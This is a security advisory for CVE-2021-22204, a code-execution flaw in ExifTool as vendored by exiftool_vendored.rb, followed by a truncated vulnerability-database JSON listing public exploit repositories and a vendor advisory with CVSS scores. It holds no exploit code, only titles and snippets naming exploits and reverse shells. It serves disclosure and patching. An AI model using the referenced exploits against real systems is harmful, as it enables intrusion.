### Impact
Arbitrary code execution can occur when `exiftool` is run against a file carrying a hostile metadata payload.
### Patches
ExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).
### Workarounds
None — upgrade to the patched version described above.
### References
https://twitter.com/wcbowling/status/1385803927321415687
https://nvd.nist.gov/vuln/detail/CVE-2021-22204
### For more information
If you have any questions or comments about this advisory, open an issue in [exiftool_vendored.rb](https://github.com/exiftool-rb/exiftool_vendored.rb/issues).
{"githubexploit": [{"lastseen": "2022-07-21T06:56:51", "description": "# CVE-2021-22204 - Exiftool Remote Code Execution\n\n## Descriptio...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T09:11:27", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-21T00:41:01", "id": "0BB93842-FE7D-5EB8-91F6-B24081F9F647", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T15:49:29", "description": "# Gitlab-Exiftool-RCE\nOriginal repos : https://github.com/CsEnox...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T14:31:02", 
"type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-03-01T17:55:55", "id": "2DB805FE-17FB-5841-B802-028048B22820", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T23:16:44", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-03T16:36:02", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-03T22:04:44", "id": "07BC6DDF-CE7C-5E5B-A4C0-E5C676C99705", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T12:59:44", "description": "# ExifTool \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\r\n\r\n\u8fd9\u5e94\u8be5\u7b97\u662fCVE-2021-22204\u7684\u5206\u6790\u6587\u7ae0\uff0c\u4f46\u66f4\u591a\u50cf\u662f\u6211\u7684\u8349\u7a3f\u672c\uff0c\u5199\u6ee1\u4e86\u5f88\u591a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-29T13:41:35", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-06-24T09:01:37", "id": "289423D9-0706-5D51-A997-22A314D78ACE", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T09:40:08", "description": "### Vulnerable Version \n7.44 ~ 12.23\n\n### Reproduce\n\n```\n$...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 
{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-12T08:51:44", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-04-26T07:56:50", "id": "57168674-74D6-508B-9507-FBA738E00A78", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-31T21:21:16", "description": "CVE-2021-22204 (Im\u00e1genes maliocisas - reverse shell)\r\nEl uso de ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-11T19:02:28", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-31T16:37:35", "id": "CAF1EB08-CE6F-59AB-918E-EABA63886936", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-22T16:21:52", "description": "# CVE-2021-22204-exiftool\nPython exploit for the CVE-2021-22204 ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-21T11:07:19", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-01-22T14:21:22", "id": "4732718C-33AB-5303-8C25-8A0835A9464C", "href": "", "cvss": {"score": 6.8, "vector": 
"AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T12:00:54", "description": "# POC-CVE-2021-22204\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-21T00:14:52", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-08-02T23:18:41", "id": "796E09A7-CF7E-5007-BB24-683DB96A3905", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-11-03T20:30:41", "description": "# CVE-2021-22204\n\nAbout the vulnerability\n---\nImproper neutraliz...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2022-01-23T10:14:31", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-01-30T10:07:25", "id": "819D8E03-36B4-5710-9315-BD393F247181", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-07T08:34:57", "description": "# CVE-2021-22204-exiftool\nPython exploit for the CVE-2021-22204 ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T18:45:07", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-08-07T05:24:21", "id": "48311C17-9A53-517D-9C70-3C1A4CDCA13A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-26T08:33:41", "description": "# Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Executi...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T22:49:47", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-03-26T05:55:53", "id": "D1EFC5A3-3F5B-5A00-9A45-80777934AC77", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-06T23:15:37", "description": "## Unauthenticated RCE on Gitlab version < 13.10.3\n\nUnauthentica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": 
"HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-05T15:42:16", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2022-03-06T23:06:59", "id": "0965CC1C-18E7-5115-A63D-624003944775", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T18:28:42", "description": "# CVE-2021-22204\n\n## Description\n\nImproper neutralization of use...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T18:56:16", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2204", "CVE-2021-22204"], "modified": "2022-03-31T18:27:27", "id": "58E81731-017D-5CF4-8117-A7FAC5D6C97F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-30T23:25:45", "description": "### Vuln Impact\n\nAn issue has been discovered in GitLab CE/EE af...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-05T16:56:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-12-30T12:03:37", "id": "D8AA4FFA-7BD1-5ACF-9344-B486A698509F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:11:23", 
"description": "# Golang-CVE-2021-22205-POC\nA bare bones CVE-2021-22205 Gitlab R...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-25T12:47:27", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-22204"], "modified": "2021-12-03T00:24:59", "id": "ECFA4525-3876-5304-9821-FE532A103C20", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:14:15", "description": "### Vuln Impact\r\n\r\nAn issue has been discovered in GitLab CE/EE ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T09:01:07", "type": "githubexploit", "title": 
"Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-2205", "CVE-2021-22204"], "modified": "2021-11-04T09:01:59", "id": "400AD2B4-EBCE-5934-92E0-C32C59BFA420", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T09:45:37", "description": "### Vuln Impact\r\n\r\nAn issue has been discovered in GitLab CE/EE ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-29T04:30:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2205", "CVE-2021-22204", "CVE-2021-22205"], "modified": "2022-03-30T09:27:05", "id": "F13B1CEC-8713-5A1E-8117-F6BED15AEA04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-29T20:19:01", "description": "<p align=\"center\">\n <h3 align=\"center\">Security Research</h3>\n ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T23:38:36", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9376", "CVE-2020-9377", "CVE-2021-22204", "CVE-2021-41773"], "modified": "2022-03-29T00:45:16", "id": "4427DEE4-E1E2-5A16-8683-D74750941604", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:05", "description": "A remote code execution vulnerability exists in ExifTool. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-13T00:00:00", "type": "checkpoint_advisories", "title": "ExifTool Remote Code Execution (CVE-2021-22204)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 